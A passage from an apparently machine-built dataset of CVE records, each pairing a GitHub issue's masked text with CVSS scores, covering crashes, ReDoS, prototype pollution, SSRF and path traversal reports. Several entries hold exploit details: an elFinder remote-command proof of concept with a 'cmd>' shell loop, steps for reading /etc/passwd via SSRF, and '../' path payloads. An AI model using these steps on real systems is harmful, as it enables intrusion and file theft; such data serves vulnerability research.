ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for APITAG ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG 
(KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG",
  63098. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  63099. "severity": "MEDIUM",
  63100. "baseScore": 6.5,
  63101. "impactScore": 5.2,
  63102. "exploitabilityScore": 1.2
  63103. },
  63104. {
  63105. "CVE_ID": "CVE-2021-23158",
  63106. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/414",
  63107. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/414",
  63108. "Repo_new": "michaelrsweet/htmldoc",
  63109. "Issue_Created_At": "2021-01-26T08:44:03Z",
  63110. "description": "APITAG double free in function pspdf_export ps APITAG Hello, While fuzzing htmldoc , I found a double free in pspdf_export test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63112. "severity": "CRITICAL",
  63113. "baseScore": 9.8,
  63114. "impactScore": 5.9,
  63115. "exploitabilityScore": 3.9
  63116. },
  63117. {
  63118. "CVE_ID": "CVE-2021-23165",
  63119. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/413",
  63120. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/413",
  63121. "Repo_new": "michaelrsweet/htmldoc",
  63122. "Issue_Created_At": "2021-01-26T08:39:00Z",
  63123. "description": "APITAG heap buffer overflow in APITAG in ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in APITAG , in ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG",
  63124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63125. "severity": "CRITICAL",
  63126. "baseScore": 9.8,
  63127. "impactScore": 5.9,
  63128. "exploitabilityScore": 3.9
  63129. },
  63130. {
  63131. "CVE_ID": "CVE-2021-23180",
  63132. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/418",
  63133. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/418",
  63134. "Repo_new": "michaelrsweet/htmldoc",
  63135. "Issue_Created_At": "2021-01-26T09:02:25Z",
  63136. "description": "APITAG SEGV in file_extension APITAG Hello, While fuzzing htmldoc , I found a SEGV in the file_extension function in APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63137. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63138. "severity": "HIGH",
  63139. "baseScore": 7.8,
  63140. "impactScore": 5.9,
  63141. "exploitabilityScore": 1.8
  63142. },
  63143. {
  63144. "CVE_ID": "CVE-2021-23191",
  63145. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/415",
  63146. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/415",
  63147. "Repo_new": "michaelrsweet/htmldoc",
  63148. "Issue_Created_At": "2021-01-26T08:50:41Z",
  63149. "description": "APITAG SEGV on unknown address NUMBERTAG Hello, While fuzzing htmldoc , I found SEGV on unknown address test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63150. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63151. "severity": "HIGH",
  63152. "baseScore": 7.8,
  63153. "impactScore": 5.9,
  63154. "exploitabilityScore": 1.8
  63155. },
  63156. {
  63157. "CVE_ID": "CVE-2021-23206",
  63158. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/416",
  63159. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/416",
  63160. "Repo_new": "michaelrsweet/htmldoc",
  63161. "Issue_Created_At": "2021-01-26T08:54:36Z",
  63162. "description": "APITAG stack buffer overflow in parse_table ps APITAG Hello, While fuzzing htmldoc , I found a stack buffer overflow in APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63163. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63164. "severity": "HIGH",
  63165. "baseScore": 7.8,
  63166. "impactScore": 5.9,
  63167. "exploitabilityScore": 1.8
  63168. },
  63169. {
  63170. "CVE_ID": "CVE-2021-23330",
  63171. "Issue_Url_old": "https://github.com/bitovi/launchpad/issues/123",
  63172. "Issue_Url_new": "https://github.com/bitovi/launchpad/issues/123",
  63173. "Repo_new": "bitovi/launchpad",
  63174. "Issue_Created_At": "2020-06-19T16:59:31Z",
  63175. "description": "Security Notice & Bug Bounty Remote Code Execution APITAG This issue has been generated on behalf of Mik NUMBERTAG URLTAG Overview launchpad URLTAG allows you to launch browsers! With APITAG The issue occurs because a user input is formatted inside a command that will be executed without any check. Bug Bounty We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded \ud83d\udcb0? Go to FILETAG We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to URLTAG \ud83d\udcda APITAG generated by APITAG helper..._",
  63176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63177. "severity": "CRITICAL",
  63178. "baseScore": 9.8,
  63179. "impactScore": 5.9,
  63180. "exploitabilityScore": 3.9
  63181. },
  63182. {
  63183. "CVE_ID": "CVE-2021-23341",
  63184. "Issue_Url_old": "https://github.com/PrismJS/prism/issues/2583",
  63185. "Issue_Url_new": "https://github.com/prismjs/prism/issues/2583",
  63186. "Repo_new": "prismjs/prism",
  63187. "Issue_Created_At": "2020-10-11T13:08:45Z",
  63188. "description": "APITAG in prism. Hi, I would like to report NUMBERTAG APITAG vulnerabilities in prism ( URLTAG \u200b). It allows cause a denial of service if highlighting crafted codes. The first APITAG The vulnerable regular expression is APITAG and is located in URLTAG The APITAG vulnerability can be exploited with the following crafted code string ERRORTAG The second APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b APITAG The third APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b CODETAG The fourth APITAG The vulnerable regular expression is APITAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG ) PATHTAG ) \\] CODETAG APITAG APITAG (^[^\\S ] ) (?: ?| )(?:. (?: ?| )) ?[^\\S ] PATHTAG CODETAG \u200b APITAG ((?:^|[&(])[ ] )if(?: ?\\/[a z?](?:[ : ?:\"[^\"] \"|\\S+))? (?:not )?(?:cmdextversion \\d+|defined \\w+|errorlevel \\d+|exist \\S+|(?:\"[^\"] \"|\\S+)?(?:==| (?:equ|neq|lss|leq|gtr|geq) )(?:\"[^\"] \"|\\S+)) CODETAG 'if NUMBERTAG CODETAG APITAG in the root directory NUMBERTAG Input the above crafted code strings and select the corresponding languages",
  63189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63190. "severity": "HIGH",
  63191. "baseScore": 7.5,
  63192. "impactScore": 3.6,
  63193. "exploitabilityScore": 3.9
  63194. },
  63195. {
  63196. "CVE_ID": "CVE-2021-23343",
  63197. "Issue_Url_old": "https://github.com/jbgutierrez/path-parse/issues/8",
  63198. "Issue_Url_new": "https://github.com/jbgutierrez/path-parse/issues/8",
  63199. "Repo_new": "jbgutierrez/path-parse",
  63200. "Issue_Created_At": "2021-02-09T06:59:32Z",
  63201. "description": "APITAG in path parse. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerabilities in APITAG . It can cause a denial of service when parsing crafted invalid paths. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
  63202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63203. "severity": "HIGH",
  63204. "baseScore": 7.5,
  63205. "impactScore": 3.6,
  63206. "exploitabilityScore": 3.9
  63207. },
  63208. {
  63209. "CVE_ID": "CVE-2021-23345",
  63210. "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/261",
  63211. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/261",
  63212. "Repo_new": "gotenberg/gotenberg",
  63213. "Issue_Created_At": "2020-11-24T19:30:47Z",
  63214. "description": "Server Side Request Forgery APITAG (in version NUMBERTAG Expected Behavior When attempting to convert html into a PDF using the /html endpoint, gotenberg should throw an exception (respond with a bad request) whenever there is an attempt to convert html with a source (src) reference to an internal system file. FILETAG FILETAG Possible Solution Respond with a bad request. Or something that indicates the requested operation is not allowed or prohibited. Check the contents of the HTML file being uploaded to determine if similar file:// protocols are referenced The use of server side requests must be limited to specific scenarios required by the application and servers must be hardened to only allow those requests. SSRF can be remediated using a variety of standard web application protections, such as NUMBERTAG Limit service types via input validation on user input: Analyze if the application must use URI/ URL in requests and if not, disallow them. When a use case requires URIs and URLs in requests, perform input validation on URI/URLs using whitelists or robust blacklists. For example, only allow URL schemes such as HTTP/HTTPS which are often required for accessing applications. Disable all other URL schemas such as file://, dict://, gopher://, ftp://. Alternatively, create a token based forwarding for SSRs which may eliminate the use of URIs altogether NUMBERTAG Limit service interactions: Carefully analyze if the server requires interactions with external servers. Based on the use case, prevent unintended behavior in one of the following ways: External service interactions required: If the server is to perform interactions with external services, the server must be hardened to safely eliminate calls to services available on the local loopback adapter and prevent any calls from the server to other internal systems NUMBERTAG External service interactions not required: If the server is to only interact with local services, configure outbound firewall rules to check any calls being made from the application. The rules must limit the web server's interaction with other hosts by routing traffic only to specified resources on the local network; i.e., web servers must disallow connections to any host not included in the whitelist. Steps to Reproduce (for bugs NUMBERTAG Configure Postman to use a proxy tool such as Burp Suite NUMBERTAG Create an HTML file using the below data: test blank html APITAG NUMBERTAG Toggle Burp Intercept on NUMBERTAG Upload this HTML file and make a request to the APITAG endpoint NUMBERTAG Forward the intercepted request to Repeater and hit send NUMBERTAG In Repeater > response section, right click and select \"show response in browser NUMBERTAG Open the response in a browser NUMBERTAG Note that the PDF file contains contents of /etc/passwd file. FILETAG FILETAG Context We'd like to hide information about the server and not allow attackers to steal sensitive data Your Environment Azure Linux Container OS version: Uni NUMBERTAG bit system: True NUMBERTAG bit process: True Processor count NUMBERTAG",
  63215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  63216. "severity": "MEDIUM",
  63217. "baseScore": 5.3,
  63218. "impactScore": 1.4,
  63219. "exploitabilityScore": 3.9
  63220. },
  63221. {
  63222. "CVE_ID": "CVE-2021-23351",
  63223. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/69",
  63224. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/69",
  63225. "Repo_new": "pires/go-proxyproto",
  63226. "Issue_Created_At": "2021-02-28T20:09:28Z",
  63227. "description": "APITAG is not secure. ERRORTAG The reader is a default APITAG wrapping a APITAG . It will read from the connection until it finds a newline. Since no limits are implemented in the code, a deliberately malformed NUMBERTAG header could be used to exhaust memory in a server process using this code a form of APITAG The exploit is simple: send a stream starting with \"PROXY\" and keep sending data (which does not contain a newline) until the target stops acknowledging. In most real world circumstances, the actual risk is small since only trusted sources should be allowed to send proxy protocol headers. However, this is still a security issue and should be resolved. Easiest fix: APITAG and scan for a newline. If none is found, then it is not a valid version NUMBERTAG header anyway, so you can fail fast (the maximum NUMBERTAG header size is NUMBERTAG bytes). Otherwise, proceed with the APITAG in full confidence.",
  63228. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
  63229. "severity": "MEDIUM",
  63230. "baseScore": 4.9,
  63231. "impactScore": 3.6,
  63232. "exploitabilityScore": 1.2
  63233. },
  63234. {
  63235. "CVE_ID": "CVE-2021-23354",
  63236. "Issue_Url_old": "https://github.com/adaltas/node-printf/issues/31",
  63237. "Issue_Url_new": "https://github.com/adaltas/node-printf/issues/31",
  63238. "Repo_new": "adaltas/node-printf",
  63239. "Issue_Created_At": "2021-02-09T11:49:09Z",
  63240. "description": "APITAG in printf. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerabilities in printf . It can cause a denial of service when using crafted invalid formats. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
  63241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63242. "severity": "HIGH",
  63243. "baseScore": 7.5,
  63244. "impactScore": 3.6,
  63245. "exploitabilityScore": 3.9
  63246. },
  63247. {
  63248. "CVE_ID": "CVE-2021-23357",
  63249. "Issue_Url_old": "https://github.com/TykTechnologies/tyk/issues/3390",
  63250. "Issue_Url_new": "https://github.com/tyktechnologies/tyk/issues/3390",
  63251. "Repo_new": "tyktechnologies/tyk",
  63252. "Issue_Created_At": "2020-11-17T23:13:51Z",
  63253. "description": "Security: Path Traversal Bug Able to delete/modify arbitrary JSON files via management API. PATHTAG APITAG FILETAG Environment: On Prem, Linux Describe the bug The function at URLTAG is able to delete arbitrary JSON files on disk where Tyk is running via the management API. The APIID is provided by the user and this value is then used to create a file on disk. If there is a file found with the same name then it will be deleted and then re created with the contents of the API creation request. Assume I create an API with PATHTAG if there is a JSON file at that location called FILETAG , it will be deleted and replaced with the API definition object from my request. This means NUMBERTAG things: Actors are able to traverse the file system of the Tyk host Actors are able to delete and modify any JSON file on the Tyk host Reproduction steps Create a file outside of where Tyk is storing the API definitions eg FILETAG Make a request to create an API with APIID '../something' Observe file get deleted and then overwritten Actual behavior Tyk deletes/modifies arbitrary JSON files Expected behavior Tyk should not use user defined input as part of file names. Recommended that the API gateway maintains a mapping between APITAG and a gateway generated APITAG i.e. a UUID. APITAG N/A Logs (debug mode or log file): N/A Configuration (tyk config file): N/A Additional context N/A",
  63254. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
  63255. "severity": "MEDIUM",
  63256. "baseScore": 5.3,
  63257. "impactScore": 3.4,
  63258. "exploitabilityScore": 1.8
  63259. },
  63260. {
  63261. "CVE_ID": "CVE-2021-23371",
  63262. "Issue_Url_old": "https://github.com/wanasit/chrono/issues/382",
  63263. "Issue_Url_new": "https://github.com/wanasit/chrono/issues/382",
  63264. "Repo_new": "wanasit/chrono",
  63265. "Issue_Created_At": "2021-03-07T23:45:58Z",
  63266. "description": "parse hangs on a date like string with lots of embedded spaces. Trying to parse this string never returns. It looks like catastrophic backtracking in the regex matching, probably due to all the embedded spaces CODETAG",
  63267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63268. "severity": "HIGH",
  63269. "baseScore": 7.5,
  63270. "impactScore": 3.6,
  63271. "exploitabilityScore": 3.9
  63272. },
  63273. {
  63274. "CVE_ID": "CVE-2021-23394",
  63275. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3295",
  63276. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3295",
  63277. "Repo_new": "studio-42/elfinder",
  63278. "Issue_Created_At": "2021-05-08T17:34:35Z",
  63279. "description": "Remote Code Execution in APITAG NUMBERTAG create a .phar file using the following URL: FILETAG NUMBERTAG Add PHP code in the APITAG file by following GET request: URLTAG APITAG NUMBERTAG Execute the OS command with the privilege of the webserver: URLTAG Tested on apache and nginx webservers. By default it works in apache webserver and it requires .phar file to be executed as php code in nginx Python3 POC: import APITAG APITAG from pwn import import APITAG APITAG Chand\" APITAG APITAG def APITAG if APITAG APITAG python3 APITAG APITAG \") APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG Za z NUMBERTAG for h in file_hash: APITAG APITAG PATHTAG APITAG &target=\"+hash_file) while True: cmd=raw_input(\"cmd>\") print(cmd) PATHTAG ()}\" res=wget(url, timeout NUMBERTAG APITAG if __name__==\"__main__\": APITAG",
  63280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63281. "severity": "CRITICAL",
  63282. "baseScore": 9.8,
  63283. "impactScore": 5.9,
  63284. "exploitabilityScore": 3.9
  63285. },
  63286. {
  63287. "CVE_ID": "CVE-2021-23398",
  63288. "Issue_Url_old": "https://github.com/AllenFang/react-bootstrap-table/issues/2071",
  63289. "Issue_Url_new": "https://github.com/allenfang/react-bootstrap-table/issues/2071",
  63290. "Repo_new": "allenfang/react-bootstrap-table",
  63291. "Issue_Created_At": "2019-04-18T11:30:31Z",
  63292. "description": "XSS when using APITAG function. Hi When using APITAG function and not converting the value to react component output is not sanitised. Therefore you can easily run XSS through it. Example: URLTAG",
  63293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63294. "severity": "MEDIUM",
  63295. "baseScore": 6.1,
  63296. "impactScore": 2.7,
  63297. "exploitabilityScore": 2.8
  63298. },
  63299. {
  63300. "CVE_ID": "CVE-2021-23400",
  63301. "Issue_Url_old": "https://github.com/nodemailer/nodemailer/issues/1289",
  63302. "Issue_Url_new": "https://github.com/nodemailer/nodemailer/issues/1289",
  63303. "Repo_new": "nodemailer/nodemailer",
  63304. "Issue_Created_At": "2021-05-22T22:32:40Z",
  63305. "description": "Header injection vulnerability in address object. Please fill the following questionnaire about your issue NUMBERTAG What kind of issue are you reporting? x] A bug in Nodemailer [ ] A bug in a plugin of Nodemailer (eg. issues with nodemailer sendgrid) [ ] Feature request [ ] Looking for help to resolve some kind of problem with Nodemailer NUMBERTAG Are you listed as a sponsor of Nodemailer project (see Sponsors button above)? [ ] Yes. Sponsors get priority support [x] No. Unless it is a bug in Nodemailer you might find support from public forums like APITAG URLTAG NUMBERTAG State your problem here: I've got a pretty standard APITAG call here in an HTTP handler: CODETAG An address that contains line breaks can add arbitrary SMTP headers. In my mind, the reason for using an address object is to avoid having to deal with escaping odd names and addresses (like would be necessary with APITAG NUMBERTAG name} APITAG NUMBERTAG APITAG ); therefore, it is expected that name and address don't have to be sanitized. Otherwise, it's not just an address object, but an \"address plus maybe arbitrary headers,\" which is not something anyone would _want_ to have. I'm not sure what other fields are vulnerable. This was discovered by APITAG",
  63306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63307. "severity": "HIGH",
  63308. "baseScore": 8.8,
  63309. "impactScore": 5.9,
  63310. "exploitabilityScore": 2.8
  63311. },
  63312. {
  63313. "CVE_ID": "CVE-2021-23409",
  63314. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/65",
  63315. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/65",
  63316. "Repo_new": "pires/go-proxyproto",
  63317. "Issue_Created_At": "2021-01-27T15:03:03Z",
  63318. "description": "Add Support for APITAG This library seems to lean heavily on inspiration from URLTAG That library supports passing in a timeout when you define the listener: APITAG It would be nice if the same feature, or a similar feature was possible with this library.",
  63319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63320. "severity": "HIGH",
  63321. "baseScore": 7.5,
  63322. "impactScore": 3.6,
  63323. "exploitabilityScore": 3.9
  63324. },
  63325. {
  63326. "CVE_ID": "CVE-2021-23409",
  63327. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/75",
  63328. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/75",
  63329. "Repo_new": "pires/go-proxyproto",
  63330. "Issue_Created_At": "2021-07-13T07:56:23Z",
  63331. "description": "APITAG is setting a hard timeout on connections regardless of header sending. I think this setting is supposed to timeout connections that are not sending the headers and terminate them after this amount of time. However, I set the setting to NUMBERTAG seconds, and the result is that all connections are terminated after NUMBERTAG seconds, even if they correctly sent the headers. The connection starts up, but is then abruptly ended after the NUMBERTAG seconds are passed. I think what is missing in NUMBERTAG is a call to APITAG to reset the timeout after the proxy header was sent successfully.",
  63332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63333. "severity": "HIGH",
  63334. "baseScore": 7.5,
  63335. "impactScore": 3.6,
  63336. "exploitabilityScore": 3.9
  63337. },
  63338. {
  63339. "CVE_ID": "CVE-2021-23418",
  63340. "Issue_Url_old": "https://github.com/nicolargo/glances/issues/1025",
  63341. "Issue_Url_new": "https://github.com/nicolargo/glances/issues/1025",
  63342. "Repo_new": "nicolargo/glances",
  63343. "Issue_Created_At": "2017-02-06T17:11:26Z",
  63344. "description": "Security audit. Description >> Issue: [B NUMBERTAG blacklist] Using Fault to parse untrusted XML data is known to be vulnerable to XML attacks. Use APITAG function to monkey patch xmlrpclib and mitigate XML vulnerabilities. Severity: High Confidence: High Location: APITAG NUMBERTAG from APITAG import APITAG APITAG NUMBERTAG from xmlrpclib import Fault, ERRORTAG APITAG Transport NUMBERTAG from urllib2 import urlopen, ERRORTAG Versions Glances (glances NUMBERTAG",
  63345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63346. "severity": "CRITICAL",
  63347. "baseScore": 9.8,
  63348. "impactScore": 5.9,
  63349. "exploitabilityScore": 3.9
  63350. },
  63351. {
  63352. "CVE_ID": "CVE-2021-23442",
  63353. "Issue_Url_old": "https://github.com/tony-tsx/cookiex-deep/issues/1",
  63354. "Issue_Url_new": "https://github.com/tony-tsx/cookiex-deep/issues/1",
  63355. "Repo_new": "tony-tsx/cookiex-deep",
  63356. "Issue_Created_At": "2021-09-06T06:29:37Z",
  63357. "description": "APITAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG",
  63358. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63359. "severity": "CRITICAL",
  63360. "baseScore": 9.8,
  63361. "impactScore": 5.9,
  63362. "exploitabilityScore": 3.9
  63363. },
  63364. {
  63365. "CVE_ID": "CVE-2021-23446",
  63366. "Issue_Url_old": "https://github.com/handsontable/handsontable/issues/8752",
  63367. "Issue_Url_new": "https://github.com/handsontable/handsontable/issues/8752",
  63368. "Repo_new": "handsontable/handsontable",
  63369. "Issue_Created_At": "2021-09-27T08:57:20Z",
  63370. "description": "Fix APITAG vulnerability and clean up major code smells. Description Steps to reproduce NUMBERTAG Demo URLTAG Your environment Handsontable version: Browser Name and version: Operating System:",
  63371. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63372. "severity": "HIGH",
  63373. "baseScore": 7.5,
  63374. "impactScore": 3.6,
  63375. "exploitabilityScore": 3.9
  63376. },
  63377. {
  63378. "CVE_ID": "CVE-2021-23448",
  63379. "Issue_Url_old": "https://github.com/jarradseers/config-handler/issues/1",
  63380. "Issue_Url_new": "https://github.com/jarradseers/config-handler/issues/1",
  63381. "Repo_new": "jarradseers/config-handler",
  63382. "Issue_Created_At": "2021-08-15T13:34:55Z",
  63383. "description": "Vulnerable to Prototype Pollution. Hey i recently found that your package is vulnerable to Prototype Pollution. FILETAG APITAG FILETAG APITAG _output_ polluted",
  63384. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63385. "severity": "CRITICAL",
  63386. "baseScore": 9.8,
  63387. "impactScore": 5.9,
  63388. "exploitabilityScore": 3.9
  63389. },
  63390. {
  63391. "CVE_ID": "CVE-2021-23449",
  63392. "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/363",
  63393. "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/363",
  63394. "Repo_new": "patriksimek/vm2",
  63395. "Issue_Created_At": "2021-09-07T09:20:16Z",
  63396. "description": "Sandbox breakout. Hi, I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: URLTAG",
  63397. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  63398. "severity": "CRITICAL",
  63399. "baseScore": 10.0,
  63400. "impactScore": 6.0,
  63401. "exploitabilityScore": 3.9
  63402. },
  63403. {
  63404. "CVE_ID": "CVE-2021-23556",
  63405. "Issue_Url_old": "https://github.com/Guake/guake/issues/1796",
  63406. "Issue_Url_new": "https://github.com/guake/guake/issues/1796",
  63407. "Repo_new": "guake/guake",
  63408. "Issue_Created_At": "2020-09-21T07:44:14Z",
  63409. "description": "Security Issue: Exposure of sensitive function, a malicious user can execute arbitrary commands via an execute_command d bus method. Describe the bug We understand that the usability of APITAG option. ( URLTAG BTW, it must not be exposure in d bus interfaces. Expected behavior guake must not exposure execute_command in d bus interfaces. Do not exposure execute_command in d bus interface. Actual behavior guake exposure execute_command in d bus interface. To Reproduce We can use gdbus to call an execute_command d bus method. CODETAG ERRORTAG cc. APITAG",
  63410. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  63411. "severity": "HIGH",
  63412. "baseScore": 8.0,
  63413. "impactScore": 5.9,
  63414. "exploitabilityScore": 2.1
  63415. },
  63416. {
  63417. "CVE_ID": "CVE-2021-23567",
  63418. "Issue_Url_old": "https://github.com/Marak/colors.js/issues/285",
  63419. "Issue_Url_new": "https://github.com/marak/colors.js/issues/285",
  63420. "Repo_new": "marak/colors.js",
  63421. "Issue_Created_At": "2022-01-08T04:26:12Z",
  63422. "description": "Zalgo issue with APITAG release. It's come to our attention that there is a zalgo bug in the APITAG release of colors. Please know we are working right now to fix the situation and will have a resolution shortly. FILETAG",
  63423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63424. "severity": "HIGH",
  63425. "baseScore": 7.5,
  63426. "impactScore": 3.6,
  63427. "exploitabilityScore": 3.9
  63428. },
  63429. {
  63430. "CVE_ID": "CVE-2021-23574",
  63431. "Issue_Url_old": "https://github.com/js-data/js-data/issues/576",
  63432. "Issue_Url_new": "https://github.com/js-data/js-data/issues/576",
  63433. "Repo_new": "js-data/js-data",
  63434. "Issue_Created_At": "2021-05-08T22:09:49Z",
  63435. "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  63436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63437. "severity": "CRITICAL",
  63438. "baseScore": 9.8,
  63439. "impactScore": 5.9,
  63440. "exploitabilityScore": 3.9
  63441. },
  63442. {
  63443. "CVE_ID": "CVE-2021-23574",
  63444. "Issue_Url_old": "https://github.com/js-data/js-data/issues/577",
  63445. "Issue_Url_new": "https://github.com/js-data/js-data/issues/577",
  63446. "Repo_new": "js-data/js-data",
  63447. "Issue_Created_At": "2021-05-09T11:04:37Z",
  63448. "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  63449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63450. "severity": "CRITICAL",
  63451. "baseScore": 9.8,
  63452. "impactScore": 5.9,
  63453. "exploitabilityScore": 3.9
  63454. },
  63455. {
  63456. "CVE_ID": "CVE-2021-23639",
